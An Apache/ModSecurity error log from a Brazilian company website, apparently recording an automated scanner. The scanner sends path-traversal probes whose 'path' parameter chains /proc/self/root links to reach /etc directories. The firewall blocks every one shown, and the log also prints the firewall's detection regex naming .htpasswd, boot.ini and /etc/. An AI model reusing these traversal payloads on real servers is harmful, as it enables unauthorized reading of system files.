[Tue Mar 17 20:41:41.454361 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:34628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmteyqAr6etmhZHNpMRAAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:43.850454 2026] [:error] [pid 16449:tid 140411624429312] [client 74.7.241.31:34638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmtkeQbjTSjgbmHFr16AAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:45.840747 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.241.31:34648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmuRj0p0SRWAqcjGGfNgAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:47.357287 2026] [:error] [pid 25836:tid 140411683178240] [client 74.7.241.31:55986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmu4h-PF_25v4hFRCPxQAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:48.827204 2026] [:error] [pid 11088:tid 140411674785536] [client 74.7.241.31:56002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmvGmqtCojLHvu5cKOngAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:49.025556 2026] [:error] [pid 11088:tid 140411733534464] [client 74.7.241.31:56002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmvWmqtCojLHvu5cKOoAAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:49.121731 2026] [proxy_fcgi:error] [pid 11088:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34466] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:41:50.639551 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:56008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmvhj0p0SRWAqcjGGfOAAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:51.915875 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.241.31:56010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmv-w_le52K8_3pV1yBgAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:53.382051 2026] [:error] [pid 29151:tid 140411683178240] [client 74.7.241.31:56016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmwfPqhzTj3BvfDX-tvgAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:54.762546 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.241.31:56018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmwuw_le52K8_3pV1yCgAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:56.226275 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:56034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmxMdf6f5d65gmYZRiKQAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:41:57.671153 2026] [:error] [pid 2598:tid 140411649607424] [client 74.7.241.31:56306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmxRj0p0SRWAqcjGGfQAAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:42:10.141910 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:34728] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:42:11.451941 2026] [:error] [pid 29151:tid 140411666392832] [client 74.7.241.31:57302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnm0_PqhzTj3BvfDX-txQAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:42:12.949661 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.241.31:57310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnm1Ow_le52K8_3pV1yDwAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:42:14.391383 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:57318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnm1tY0UrI5A3LftIwk_AAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:42:15.836242 2026] [:error] [pid 11088:tid 140411708356352] [client 74.7.241.31:57326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnm12mqtCojLHvu5cKOpQAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:42:16.035271 2026] [:error] [pid 11088:tid 140411725141760] [client 74.7.241.31:57326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnm2GmqtCojLHvu5cKOpgAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:42:17.319018 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:38568] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnm2da6ubjKNq_cu4YsHQAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:42:18.739350 2026] [:error] [pid 6296:tid 140411691570944] [client 74.7.241.31:38570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnm2nIk7brgkOH-rIWx_QAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:42:32.125820 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:35032] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:42:54.122154 2026] [proxy_fcgi:error] [pid 16449:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35426] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:42:54.747708 2026] [:error] [pid 11088:tid 140411674785536] [client 74.7.244.43:60010] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnm_mmqtCojLHvu5cKOvAAAAIg"]
[Tue Mar 17 20:43:01.736568 2026] [:error] [pid 29151:tid 140411674785536] [client 74.7.243.128:43022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnnBfPqhzTj3BvfDX-t5wAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:43:16.125821 2026] [proxy_fcgi:error] [pid 25836:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35796] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:43:19.888917 2026] [:error] [pid 6296:tid 140411666392832] [client 74.7.228.61:55032] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnnF3Ik7brgkOH-rIWyCgAAAUk"]
[Tue Mar 17 20:43:21.187849 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.241.31:38580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnnGew_le52K8_3pV1yPAAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
